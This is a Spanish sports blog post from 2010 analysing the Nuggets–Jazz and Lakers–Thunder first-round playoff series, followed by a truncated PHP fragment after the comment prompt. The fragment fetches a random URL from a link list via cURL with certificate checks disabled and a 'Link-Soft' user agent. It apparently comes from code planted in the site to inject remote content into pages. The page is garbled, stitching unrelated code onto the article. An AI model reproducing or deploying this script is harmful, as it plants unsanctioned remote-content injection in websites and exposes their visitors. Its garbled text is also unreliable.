Playoffs 2009-2010: Primera Ronda del Oeste (II)

02 de May de 2010 por TheDeerHunter

NUGGETS 2 – JAZZ 4

Acierto pleno en nuestro pronóstico. Nos dejamos llevar por la trayectoria final de uno y otro equipo en la regular y por esta vez resultó el indicador más claro del estado de forma de uno y otro y de lo que nos iba a deparar la eliminatoria. Ya nos había parecido raro que Utah terminara cayendo a la parte baja del cuadro y quien más y quien menos lo veía como el no-cabeza de serie más complicado de la primera ronda. La eliminatoria ha estado marcada por las bajas: Okur, Kirilenkon, Nenê… pero al final la definitiva para Denver ha sido la que ha arrastrado durante todo su viacrucis final, la del coach George Karl y por ahí el equipo se ha mostrado excesivamente caótico, como en sus peores tiempos, sobre todo en el aspecto defensivo por cómo han convertido a Utah en una máquina de anotar puntos.

Como claves, en general casi todos los factores se han decantado a favor de Utah. Por dentro Boozer y Millsap se han impuesto con cierta comodidad y Deron Williams ha hecho y deshecho como le ha venido en gana durante toda la serie. Por los Nuggets, seguimos sin econtrar en Carmelo Anthony un líder sólido como el jugador franquicia que debería de ser y Billups, sin cuajar en absoluto mala serie, no ha brillado como en otras ocasiones. El resto bastante decepcionantes, la verdad.

MVP: En estos momentos no cabe duda de que Deron Williams es el mejor base de la liga. Él sí es un líder sólido y lo ha demostrado con unos 25 puntos 11 asistencias que no deberían envidiar a nadie. La “extraña pareja” que forma con Carlos Boozer nos remite a los mismísimos pilares de la franquicia mormona.

El rookie: Wesley Matthews se ha consolidado en su primer año como el escolta titular que necesitaba Utah para dar un salto de nivel. Ty Lawson ha terminado decepcionando un poco.

La sorpresa: Más allá de los números hay que valorar lo dignamente que ha defendido la complicada suplencia de Okur el chaval Fyrylo Fesenko. Pieza clave para sujetar al animal de Nenê.

La decepción: Hubo un tiempo en el que considerábamos a JR Smith como el verdadero mejor 6º hombre de la liga, un titular en toda regla y una de las mejores bazas ofensivas del equipo. Por esta serie no lo será, desde luego.

El mayor esfuerzo en vano: Carmelo Anthony ha cuajado números de superhombre, con actuaciones bestiales en alguno de los partidos. Sin embargo no consigue borrarnos esa sensación de perderse en si mismo cuando las cosas no van de cara.

LAKERS 4 – THUNDER 2

Nuestro pecado fue vislumbrar una eliminatoria algo más fácil para Lakers que lo que ha llegado a deparar. La gran mayoría de analistas auguraba 6 partidos y nosotros dimos 5. Por muy poco no han sido 7 e incluso durante buena parte de la misma la posibilidad de que cambiara de signo ha estado ahí. Los Thunder han sido una de las grandes sensaciones de esta primera ronda. El ambiente en el Ford Center de Oklahoma City ha sido increíble, tan sólo comparable con el “We believe” de la campanada de aquellos Warriors de Baron Davis o las cencerradas en el ARCO arena de Sacramento. Y ensordecidos por una carga de decibelios que ensombrecería un concierto de Heavy Metal, los Lakers lo han pasado muy mal ante un equipo que ha demostrado calidad y madurez. Esta serie hubiera sido carne de sorpresa contra cualquiera, pero Phil Jackson ha logrado jugar sus cartas para superar esta dura prueba. Para ello hemos visto una versión de los campeones muy superior a la de la regular, como también a la de las primeras rondas del pasado año.

MVP: Con un Kobe algo renqueante y bien defendido, el jugador más regular de la eliminatoria y el líder sobre el que se ha cimentado la victoria ha sido Pau Gasol. 18 puntos, más de 12 rebotes, casi 4 asistencias y un tapón, dando a su equipo lo que necesitaba casi en cualquier momento.

El rookie: El ¿futurible nacional? Serge Ibaka ha superado todas las expectativas, dándole una consistencia al juego interior de Thunder que a priori no tenía.

La sorpresa: No lo es tanto, pero con Durant muy bien amarrado por Artest, Westbrook ha sido el que más problemas ha generado para los Lakers. Tan sólo un gran esfuerzo defensivo de Kobe ha logrado minimizarle en parte.

La decepción: El 35% de acierto de Kevin Durant. Tan sólo sus 10 tiros libres lanzados por partido han logrado maquillar unas estadísticas muy destrozadas por la acción de Ron Artest, el oscuro ganador del duelo.

El mayor esfuerzo en vano: Se lo daremos a todo el equipo de los Thunder, con su técnico Scott Brooks a la cabeza. Han realizado un esfuerzo encomiable y han puesto toda la carne en el asador para superar esta eliminatoria.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>